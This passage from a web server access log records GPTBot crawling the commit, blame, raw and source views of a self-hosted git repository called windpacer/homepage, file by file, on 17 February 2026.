192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" [Client 74.7.227.38] [Length 10775] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" [Client 74.7.227.38] [Length 11449] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" [Client 74.7.227.38] [Length 11883] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" [Client 74.7.227.38] [Length 11476] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" [Client 74.7.227.38] [Length 9909] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" -[17/Feb/2026:13:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" [Client 74.7.227.38] [Length 10629] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:13:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" [Client 74.7.227.38] [Length 14345] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" [Client 74.7.227.38] [Length 10642] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:13:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" -[17/Feb/2026:13:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" [Client 74.7.227.38] [Length 11603] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" [Client 74.7.227.38] [Length 11192] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" [Client 74.7.227.38] [Length 9857] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" -[17/Feb/2026:13:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" -[17/Feb/2026:13:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" -[17/Feb/2026:13:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" [Client 74.7.227.38] [Length 11314] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" [Client 74.7.227.38] [Length 10728] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" -[17/Feb/2026:13:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" [Client 74.7.227.38] [Length 9918] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" [Client 74.7.227.38] [Length 10564] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" [Client 74.7.227.38] [Length 10531] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:13:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" [Client 74.7.227.38] [Length 9887] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" -[17/Feb/2026:13:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" -[17/Feb/2026:13:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" [Client 74.7.227.38] [Length 10727] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" [Client 74.7.227.38] [Length 10867] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" [Client 74.7.227.38] [Length 10470] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" [Client 74.7.227.38] [Length 10859] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" -[17/Feb/2026:13:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" -[17/Feb/2026:13:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" [Client 74.7.227.38] [Length 9837] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" -[17/Feb/2026:13:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" [Client 74.7.227.38] [Length 9841] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" -[17/Feb/2026:13:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" [Client 74.7.227.38] [Length 9826] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" -[17/Feb/2026:13:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" [Client 74.7.227.38] [Length 10289] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" -[17/Feb/2026:13:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" [Client 74.7.227.38] [Length 11003] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" -[17/Feb/2026:13:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" [Client 74.7.227.38] [Length 10085] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" -[17/Feb/2026:13:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" [Client 74.7.227.38] [Length 10856] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" [Client 74.7.227.38] [Length 10699] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" -[17/Feb/2026:13:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" [Client 74.7.227.38] [Length 10911] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" -[17/Feb/2026:13:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" [Client 74.7.227.38] [Length 10783] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" -[17/Feb/2026:13:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 74.7.227.38] [Length 11454] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" [Client 74.7.227.38] [Length 10872] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" -[17/Feb/2026:13:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" [Client 74.7.227.38] [Length 10015] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:13:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" [Client 74.7.227.38] [Length 10822] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" -[17/Feb/2026:13:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 74.7.227.38] [Length 11576] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" -[17/Feb/2026:13:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" -[17/Feb/2026:13:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" [Client 74.7.227.38] [Length 10481] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" -[17/Feb/2026:13:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" -[17/Feb/2026:13:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" [Client 74.7.227.38] [Length 10898] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" -[17/Feb/2026:13:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 74.7.227.38] [Length 11480] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 74.7.227.38] [Length 11889] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" -[17/Feb/2026:13:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 74.7.227.38] [Length 10727] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" -[17/Feb/2026:13:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" [Client 74.7.227.38] [Length 11225] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:13:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" -[17/Feb/2026:13:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 